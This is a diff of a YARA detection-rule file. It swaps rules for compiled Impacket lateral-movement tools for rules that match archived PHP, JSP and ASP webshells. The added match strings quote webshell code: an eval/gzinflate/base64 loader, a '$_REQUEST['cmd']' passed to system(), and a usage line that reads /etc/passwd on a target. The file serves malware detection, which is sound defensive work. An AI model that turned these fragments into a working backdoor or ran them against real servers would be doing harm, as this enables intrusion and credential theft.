+		hash = "1674bd40eb98b48427c547bf9143aa7fbe2f4a59"
+		logic_hash = "b76400c320e6294b0c831fbbb8e08a9d2097fbb027065f9c4b496d4b005ba016"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "7d715217e23a471d42d95c624179fe7de085af5670171d212b7b798ed9bf07c2"
 
 	strings:
-		$s1 = "logging.config(" ascii
-		$s2 = "ssmbexec" fullword ascii
+		$s0 = "<?$d='G7mHWQ9vvXiL/QX2oZ2VTDpo6g3FYAa6X+8DMIzcD0eHZaBZH7jFpZzUz7XNenxSYvBP2Wy36U"
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 17000KB and all of them )
+		all of them
 }
-rule SIGNATURE_BASE_Impacket_Tools_Goldenpac : FILE
+rule SIGNATURE_BASE_Webshell_C99_Madnet
 {
 	meta:
-		description = "Compiled Impacket Tools"
+		description = "PHP Webshells Github Archive - file c99_madnet.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "9894d16c-83fa-5e1d-9ca6-572deeec006a"
-		date = "2017-04-07"
-		modified = "2025-03-29"
-		reference = "https://github.com/maaaaz/impacket-examples-windows"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_impacket_tools.yar#L224-L239"
+		id = "f2b9c3d1-1c55-59cb-a9bf-8b4011f86a3b"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L5978-L5993"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "0c764083a699204819f9ff6e2664a50d467447d0fff040ef32a8e28cc678b3cd"
+		hash = "17613df393d0a99fd5bea18b2d4707f566cff219"
+		logic_hash = "cd4048f28405f106302643656ae5f8a257aaec0184a8057a9dffbda9bb857027"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "4f7fad0676d3c3d2d89e8d4e74b6ec40af731b1ddf5499a0b81fc3b1cd797ee3"
 
 	strings:
-		$s1 = "impacket.examples.serviceinstall(" ascii
-		$s2 = "bgoldenPac.exe" fullword ascii
-		$s3 = "json.scanner(" ascii
+		$s0 = "$md5_pass = \"\"; //If no pass then hash" fullword
+		$s1 = "eval(gzinflate(base64_decode('"
+		$s2 = "$pass = \"pass\";  //Pass" fullword
+		$s3 = "$login = \"user\"; //Login" fullword
+		$s4 = "             //Authentication" fullword
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 17000KB and all of them )
+		all of them
 }
-rule SIGNATURE_BASE_Impacket_Tools_Netview : FILE
+rule SIGNATURE_BASE_Webshell_C99_Locus7S
 {
 	meta:
-		description = "Compiled Impacket Tools"
+		description = "PHP Webshells Github Archive - file c99_locus7s.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "1b9238d2-b9b1-5633-8481-05a3a97af5a6"
-		date = "2017-04-07"
-		modified = "2025-03-29"
-		reference = "https://github.com/maaaaz/impacket-examples-windows"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_impacket_tools.yar#L241-L256"
+		id = "f92fe5a2-e465-56ed-a77b-b32ea4c2c105"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L5994-L6009"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "e0beb6235838b4e8a1312ba53c539c6c3d732ba13a0190c654dcf7ec4389e364"
+		hash = "d413d4700daed07561c9f95e1468fb80238fbf3c"
+		logic_hash = "5ecfc5f6da471bd3037228c0bc762d50762933af3cf6674210c7b2017a45a646"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "ab909f8082c2d04f73d8be8f4c2640a5582294306dffdcc85e83a39d20c49ed6"
 
 	strings:
-		$s1 = "impacket.dcerpc.v5.wkst(" ascii
-		$s2 = "dummy_threading(" ascii
-		$s3 = "snetview" fullword ascii
+		$s8 = "$encoded = base64_encode(file_get_contents($d.$f)); " fullword
+		$s9 = "$file = $tmpdir.\"dump_\".getenv(\"SERVER_NAME\").\"_\".$db.\"_\".date(\"d-m-Y"
+		$s10 = "else {$tmp = htmlspecialchars(\"./dump_\".getenv(\"SERVER_NAME\").\"_\".$sq"
+		$s11 = "$c99sh_sourcesurl = \"http://locus7s.com/\"; //Sources-server " fullword
+		$s19 = "$nixpwdperpage = 100; // Get first N lines from /etc/passwd " fullword
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 17000KB and all of them )
+		2 of them
 }
-rule SIGNATURE_BASE_Impacket_Tools_Smbtorture : FILE
+rule SIGNATURE_BASE_Webshell_Jspwebshell_1_2
 {
 	meta:
-		description = "Compiled Impacket Tools"
+		description = "PHP Webshells Github Archive - file JspWebshell_1.2.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "4f9b55e2-93ce-5d08-a228-73233fb0a2c6"
-		date = "2017-04-07"
-		modified = "2025-03-29"
-		reference = "https://github.com/maaaaz/impacket-examples-windows"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_impacket_tools.yar#L258-L272"
+		id = "dfd8c88d-4fe2-5786-9d71-65dba525c358"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L6010-L6026"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "63cbd6511c5498b39fa5efadb8fe0caeeaa8d4c2afe534a0169ea38f205a9cba"
+		hash = "0bed4a1966117dd872ac9e8dceceb54024a030fa"
+		logic_hash = "13e696c1c671d7fda832c84f150e3f41ed55bf888c4bebfeb06ea68d6be65527"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "d2856e98011541883e5b335cb46b713b1a6b2c414966a9de122ee7fb226aa7f7"
 
 	strings:
-		$s1 = "impacket" fullword ascii
-		$s2 = "ssmbtorture" fullword ascii
+		$s0 = "System.out.println(\"CreateAndDeleteFolder is error:\"+ex); " fullword
+		$s1 = "String password=request.getParameter(\"password\");" fullword
+		$s3 = "<%@ page contentType=\"text/html; charset=GBK\" language=\"java\" import=\"java."
+		$s7 = "String editfile=request.getParameter(\"editfile\");" fullword
+		$s8 = "//String tempfilename=request.getParameter(\"file\");" fullword
+		$s12 = "password = (String)session.getAttribute(\"password\");" fullword
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 17000KB and all of them )
+		3 of them
 }
-rule SIGNATURE_BASE_Impacket_Tools_Mimikatz : FILE
+rule SIGNATURE_BASE_Webshell_Safe0Ver
 {
 	meta:
-		description = "Compiled Impacket Tools"
+		description = "PHP Webshells Github Archive - file safe0ver.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "0b1f5ad0-7070-58d5-946f-157dcb9627ab"
-		date = "2017-04-07"
-		modified = "2025-03-29"
-		reference = "https://github.com/maaaaz/impacket-examples-windows"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_impacket_tools.yar#L274-L289"
+		id = "a7fc8c89-f7a1-5958-823a-763dedb3066d"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L6027-L6044"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "0dce4086887877aa77063dfa3c69d7a17cfa0815c4ca417144d3bbb6ebe68650"
+		hash = "366639526d92bd38ff7218b8539ac0f154190eb8"
+		logic_hash = "ae5de63b79804cf8c99bc5ea0c8862cf05e4085451d2b516cf95565bf32f3876"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "2d8d500bcb3ffd22ddd8bd68b5b2ce935c958304f03729442a20a28b2c0328c1"
 
 	strings:
-		$s1 = "impacket" fullword ascii
-		$s2 = "smimikatz" fullword ascii
-		$s3 = "otwsdlc" fullword ascii
+		$s3 = "$scriptident = \"$scriptTitle By Evilc0der.com\";" fullword
+		$s4 = "while (file_exists(\"$lastdir/newfile$i.txt\"))" fullword
+		$s5 = "else { /* <!-- Then it must be a File... --> */" fullword
+		$s7 = "$contents .= htmlentities( $line ) ;" fullword
+		$s8 = "<br><p><br>Safe Mode ByPAss<p><form method=\"POST\">" fullword
+		$s14 = "elseif ( $cmd==\"upload\" ) { /* <!-- Upload File form --> */ " fullword
+		$s20 = "/* <!-- End of Actions --> */" fullword
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 17000KB and all of them )
+		3 of them
 }
-rule SIGNATURE_BASE_Impacket_Tools_Smbrelayx : FILE
+rule SIGNATURE_BASE_Webshell_Uploader
 {
 	meta:
-		description = "Compiled Impacket Tools"
+		description = "PHP Webshells Github Archive - file Uploader.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "84abf3cf-841c-592d-a9d1-71d5e76eb43f"
-		date = "2017-04-07"
-		modified = "2025-03-29"
-		reference = "https://github.com/maaaaz/impacket-examples-windows"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_impacket_tools.yar#L291-L307"
+		id = "c68e15d9-865e-5269-a91c-00619fe76305"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L6045-L6056"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "2afcede9d9f5af102c68e705f29242bc3a56485e79c0acfc347a4ea7f823dfda"
+		hash = "e216c5863a23fde8a449c31660fd413d77cce0b7"
+		logic_hash = "c4b915f60a952131caa2c4f5bb2eea85ef25f27cabb8ad36a6bb928433558954"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "9706eb99e48e445ac4240b5acb2efd49468a800913e70e40b25c2bf80d6be35f"
 
 	strings:
-		$s1 = "impacket.examples.secretsdump" fullword ascii
-		$s2 = "impacket.examples.serviceinstall" fullword ascii
-		$s3 = "impacket.smbserver(" ascii
-		$s4 = "SimpleHTTPServer(" ascii
+		$s1 = "move_uploaded_file($userfile, \"entrika.php\"); " fullword
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 18000KB and 3 of them )
+		all of them
 }
-rule SIGNATURE_BASE_Impacket_Tools_Wmipersist : FILE
+rule SIGNATURE_BASE_Webshell_Php_Webshells_Kral
 {
 	meta:
-		description = "Compiled Impacket Tools"
+		description = "PHP Webshells Github Archive - file kral.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "29bda652-28f0-5ab6-9bc2-411f20ab0dda"
-		date = "2017-04-07"
-		modified = "2025-03-29"
-		reference = "https://github.com/maaaaz/impacket-examples-windows"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_impacket_tools.yar#L309-L323"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L6057-L6073"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "df0dfaed264e0acc57f74e40addcaf52f6d8e832524eb638b682a358c81da83f"
+		hash = "4cd1d1a2fd448cecc605970e3a89f3c2e5c80dfc"
+		logic_hash = "0aded226f4e54c0169b9fbda91458f581ea47f9f8bda61a350b5e6f8b60931f3"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "2527fff1a3c780f6a757f13a8912278a417aea84295af1abfa4666572bbbf086"
 
 	strings:
-		$s1 = "swmipersist" fullword ascii
-		$s2 = "\\yzHPlU=QA" ascii
+		$s1 = "$adres=gethostbyname($ip);" fullword
+		$s3 = "curl_setopt($ch,CURLOPT_POSTFIELDS,\"domain=\".$site);" fullword
+		$s4 = "$ekle=\"/index.php?option=com_user&view=reset&layout=confirm\";" fullword
+		$s16 = "echo $son.' <br> <font color=\"green\">Access</font><br>';" fullword
+		$s17 = "<p>kodlama by <a href=\"mailto:priv8coder@gmail.com\">BLaSTER</a><br /"
+		$s20 = "<p><strong>Server listeleyici</strong><br />" fullword
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 17000KB and all of them )
+		2 of them
 }
-rule SIGNATURE_BASE_Impacket_Tools_Lookupsid : FILE
+rule SIGNATURE_BASE_Webshell_Cgitelnet
 {
 	meta:
-		description = "Compiled Impacket Tools"
+		description = "PHP Webshells Github Archive - file cgitelnet.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "27f13397-b044-54b4-b5e8-c5f7ed374f59"
-		date = "2017-04-07"
-		modified = "2025-03-29"
-		reference = "https://github.com/maaaaz/impacket-examples-windows"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_impacket_tools.yar#L325-L339"
+		id = "b02d8549-ebfe-522c-9a6d-8657273da3ed"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L6074-L6088"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "629ddd49377017d6ea2aac9665b21dfdf9a50c917bf915ea892faafd841bf817"
+		hash = "72e5f0e4cd438e47b6454de297267770a36cbeb3"
+		logic_hash = "e9b7096d5a19c9d5423bbfe125ae0347853919ab092efa98f0687a5d0cf68953"
 		score = 75
-		quality = 85
-		tags = "FILE"
+		quality = 60
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "47756725d7a752d3d3cfccfb02e7df4fa0769b72e008ae5c85c018be4cf35cc1"
 
 	strings:
-		$s1 = "slookupsid" fullword ascii
-		$s2 = "impacket.dcerpc" fullword ascii
+		$s9 = "# Author Homepage: http://www.rohitab.com/" fullword
+		$s10 = "elsif($Action eq \"command\") # user wants to run a command" fullword
+		$s18 = "# in a command line on Windows NT." fullword
+		$s20 = "print \"Transfered $TargetFileSize Bytes.<br>\";" fullword
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 15000KB and all of them )
+		2 of them
 }
-rule SIGNATURE_BASE_Impacket_Tools_Wmiquery : FILE
+rule SIGNATURE_BASE_Webshell_Simple_Backdoor_2
 {
 	meta:
-		description = "Compiled Impacket Tools"
+		description = "PHP Webshells Github Archive - file simple-backdoor.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "e8bdf27a-9763-5947-854f-162f74ff53be"
-		date = "2017-04-07"
-		modified = "2025-03-29"
-		reference = "https://github.com/maaaaz/impacket-examples-windows"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_impacket_tools.yar#L341-L355"
+		id = "faddd38e-d0c6-5299-9983-53351af1ece5"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		old_rule_name = "WebShell_simple_backdoor"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L6089-L6109"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "fa237b5c1b4881804c33152a1ce9f3a571b506178fde455a8dd9f92af68c5610"
+		hash = "edcd5157a68fa00723a506ca86d6cbb8884ef512"
+		logic_hash = "655e445e51ec0f1bdce006a72acf3bce95941a349c279c14768760fa9f6f9d76"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "202a1d149be35d96e491b0b65516f631f3486215f78526160cf262d8ae179094"
 
 	strings:
-		$s1 = "swmiquery" fullword ascii
-		$s2 = "\\yzHPlU=QA" ascii
+		$s0 = "<!-- Simple PHP backdoor by DK (http://michaeldaw.org) -->" fullword
+		$s1 = "<!--    http://michaeldaw.org   2006    -->" fullword
+		$s2 = "Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd" fullword
+		$s3 = "        echo \"</pre>\";" fullword
+		$s4 = "        $cmd = ($_REQUEST['cmd']);" fullword
+		$s5 = "        echo \"<pre>\";" fullword
+		$s6 = "if(isset($_REQUEST['cmd'])){" fullword
+		$s7 = "        die;" fullword
+		$s8 = "        system($cmd);" fullword
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 17000KB and all of them )
+		all of them
 }
-rule SIGNATURE_BASE_Impacket_Tools_Atexec : FILE
+rule SIGNATURE_BASE_Webshell_Safe_Mode_Bypass_PHP_4_4_2_And_PHP_5_1_2_2
 {
 	meta:
-		description = "Compiled Impacket Tools"
+		description = "PHP Webshells Github Archive - file Safe_Mode Bypass PHP 4.4.2 and PHP 5.1.2.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "4f02e304-69d4-5952-80be-793379bccac0"
-		date = "2017-04-07"
-		modified = "2025-03-29"
-		reference = "https://github.com/maaaaz/impacket-examples-windows"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_impacket_tools.yar#L357-L373"
+		id = "a504442f-85f2-55a1-8a07-1e0faccf8bc0"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L6110-L6124"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "e9537a67e17fb980505aead84b15c7dc8a2f3f1e9a4088edd8b313f1b7a9675d"
+		hash = "8fdd4e0e87c044177e9e1c97084eb5b18e2f1c25"
+		logic_hash = "fbe1f77e00fbc4e58cbad564e2d96c0381765ac799dfdf6cc2580428c68f97a5"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "337bd5858aba0380e16ee9a9d8f0b3f5bfc10056ced4e75901207166689fbedc"
 
 	strings:
-		$s1 = "batexec.exe.manifest" fullword ascii
-		$s2 = "satexec" fullword ascii
-		$s3 = "impacket.dcerpc" fullword ascii
-		$s4 = "# CSZq" fullword ascii
+		$s1 = "<option value=\"/etc/passwd\">Get /etc/passwd</option>" fullword
+		$s3 = "xb5@hotmail.com</FONT></CENTER></B>\");" fullword
+		$s4 = "$v = @ini_get(\"open_basedir\");" fullword
+		$s6 = "by PHP Emperor<xb5@hotmail.com>" fullword
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 15000KB and 3 of them )
+		2 of them
 }
-rule SIGNATURE_BASE_Impacket_Tools_Psexec : FILE
+rule SIGNATURE_BASE_Webshell_Ntdaddy_V1_9
 {
 	meta:
-		description = "Compiled Impacket Tools"
+		description = "PHP Webshells Github Archive - file NTDaddy v1.9.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "5e8d0964-7e6a-5ff6-b9db-e37f997c3e05"
-		date = "2017-04-07"
-		modified = "2025-03-29"
-		reference = "https://github.com/maaaaz/impacket-examples-windows"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_impacket_tools.yar#L375-L390"
+		id = "a175fd28-5dc2-5827-87f0-4117e889e90e"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L6125-L6139"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "922b2adec9c73d36343c0182f72f5a325c93c051a22e3f80236f942287d0738b"
+		hash = "79519aa407fff72b7510c6a63c877f2e07d7554b"
+		logic_hash = "fdf8b4bb4980e588ad5ccee2d047660980d39f38617f887c5762dcdb0b858267"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "27bb10569a872367ba1cfca3cf1c9b428422c82af7ab4c2728f501406461c364"
 
 	strings:
-		$s1 = "impacket.examples.serviceinstall(" ascii
-		$s2 = "spsexec" fullword ascii
-		$s3 = "impacket.examples.remcomsvc(" ascii
+		$s2 = "|     -obzerve : mr_o@ihateclowns.com |" fullword
+		$s6 = "szTempFile = \"C:\\\" & oFileSys.GetTempName( )" fullword
+		$s13 = "<form action=ntdaddy.asp method=post>" fullword
+		$s17 = "response.write(\"<ERROR: THIS IS NOT A TEXT FILE>\")" fullword
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 17000KB and 2 of them )
+		2 of them
 }
-rule SIGNATURE_BASE_Impacket_Tools_Generic_1 : FILE
+rule SIGNATURE_BASE_Webshell_Lamashell
 {
 	meta:
-		description = "Compiled Impacket Tools"
+		description = "PHP Webshells Github Archive - file lamashell.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "d2ce6426-d165-5569-a992-268f05622653"
-		date = "2017-04-07"
-		modified = "2025-03-29"
-		reference = "https://github.com/maaaaz/impacket-examples-windows"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_impacket_tools.yar#L392-L427"
+		id = "60e39eed-baa2-5999-8560-0a0242ce2608"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L6140-L6156"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "a66953ca6a99a7880d757a754bb3010aa394de73292975a3741ec5cf1f20385d"
+		hash = "b71181e0d899b2b07bc55aebb27da6706ea1b560"
+		logic_hash = "e58dbd6b9c65a139828890a3fadfad9031580fe189066489d266d37d7078ad98"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "4f7fad0676d3c3d2d89e8d4e74b6ec40af731b1ddf5499a0b81fc3b1cd797ee3"
-		hash2 = "d256d1e05695d62a86d9e76830fcbb856ba7bd578165a561edd43b9f7fdb18a3"
-		hash3 = "2d8d500bcb3ffd22ddd8bd68b5b2ce935c958304f03729442a20a28b2c0328c1"
-		hash4 = "ab909f8082c2d04f73d8be8f4c2640a5582294306dffdcc85e83a39d20c49ed6"
-		hash5 = "e2205539f29972d4e2a83eabf92af18dd406c9be97f70661c336ddf5eb496742"
-		hash6 = "27bb10569a872367ba1cfca3cf1c9b428422c82af7ab4c2728f501406461c364"
-		hash7 = "dc85a3944fcb8cc0991be100859c4e1bf84062f7428c4dc27c71e08d88383c98"
-		hash8 = "0f7f0d8afb230c31fe6cf349c4012b430fc3d6722289938f7e33ea15b2996e1b"
-		hash9 = "21d85b36197db47b94b0f4995d07b040a0455ebbe6d413bc33d926ee4e0315d9"
-		hash10 = "4c2921702d18e0874b57638433474e54719ee6dfa39d323839d216952c5c834a"
-		hash11 = "47afa5fd954190df825924c55112e65fd8ed0f7e1d6fd403ede5209623534d7d"
-		hash12 = "7d715217e23a471d42d95c624179fe7de085af5670171d212b7b798ed9bf07c2"
-		hash13 = "9706eb99e48e445ac4240b5acb2efd49468a800913e70e40b25c2bf80d6be35f"
-		hash14 = "d2856e98011541883e5b335cb46b713b1a6b2c414966a9de122ee7fb226aa7f7"
-		hash15 = "8ab2b60aadf97e921e3a9df5cf1c135fbc851cb66d09b1043eaaa1dc01b9a699"
-		hash16 = "efff15e1815fb3c156678417d6037ddf4b711a3122c9b5bc2ca8dc97165d3769"
-		hash17 = "e300339058a885475f5952fb4e9faaa09bb6eac26757443017b281c46b03108b"
-		hash18 = "19544863758341fe7276c59d85f4aa17094045621ca9c98f8a9e7307c290bad4"
-		hash19 = "2527fff1a3c780f6a757f13a8912278a417aea84295af1abfa4666572bbbf086"
-		hash20 = "202a1d149be35d96e491b0b65516f631f3486215f78526160cf262d8ae179094"
 
 	strings:
-		$s1 = "bpywintypes27.dll" fullword ascii
-		$s2 = "hZFtPC" fullword ascii
-		$s3 = "impacket" ascii
+		$s0 = "if(($_POST['exe']) == \"Execute\") {" fullword
+		$s8 = "$curcmd = $_POST['king'];" fullword
+		$s16 = "\"http://www.w3.org/TR/html4/loose.dtd\">" fullword
+		$s18 = "<title>lama's'hell v. 3.0</title>" fullword
+		$s19 = "_|_  O    _    O  _|_"
+		$s20 = "$curcmd = \"ls -lah\";" fullword
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 21000KB and all of ( $s* ) ) or ( all of them )
+		2 of them
 }
-rule SIGNATURE_BASE_Impacket_Lateral_Movement : FILE
+rule SIGNATURE_BASE_Webshell_Simple_PHP_Backdoor_By_DK
 {
 	meta:
-		description = "Detects Impacket Network Aktivity for Lateral Movement"
-		author = "Markus Neis"
-		id = "44db234c-ac81-5d21-bc2a-8cfd88807c0d"
-		date = "2018-03-22"
-		modified = "2025-03-29"
-		reference = "https://github.com/CoreSecurity/impacket"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_impacket_tools.yar#L429-L447"
+		description = "PHP Webshells Github Archive - file Simple_PHP_backdoor_by_DK.php"
+		author = "Florian Roth (Nextron Systems)"
+		id = "2c424714-1d2c-5b89-b1bc-a201e37a0a5d"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L6157-L6172"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "6628c27474d5235d5b510a55215762980a5b526b353b740344cb669e8e023e3c"
-		score = 60
+		hash = "03f6215548ed370bec0332199be7c4f68105274e"
+		logic_hash = "1f65f759ec4045c521085aad84d0aea4dcfcf26eac4357751cf1dde6886d1718"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "impacket.dcerpc.v5.transport(" ascii
-		$s2 = "impacket.smbconnection(" ascii
-		$s3 = "impacket.dcerpc.v5.ndr(" ascii
-		$s4 = "impacket.spnego(" ascii
-		$s5 = "impacket.smb(" ascii
-		$s6 = "impacket.ntlm(" ascii
-		$s7 = "impacket.nmb(" ascii
+		$s0 = "<!-- Simple PHP backdoor by DK (http://michaeldaw.org) -->" fullword
+		$s1 = "<!--    http://michaeldaw.org   2006    -->" fullword
+		$s2 = "Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd" fullword
+		$s6 = "if(isset($_REQUEST['cmd'])){" fullword
+		$s8 = "system($cmd);" fullword
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 14000KB and 2 of them
+		2 of them
 }
-rule SIGNATURE_BASE_Apt_Projectsauron_Pipe_Backdoor : FILE
+rule SIGNATURE_BASE_Webshell_Moroccan_Spamers_Ma_Edition_By_Ghost
 {
 	meta:
-		description = "Rule to detect ProjectSauron pipe backdoors"
-		author = "Kaspersky Lab"
-		id = "5a1dd4b3-a03c-51bb-a7bc-25729b487f70"
-		date = "2016-08-08"
-		modified = "2023-12-05"
-		reference = "https://securelist.com/blog/"
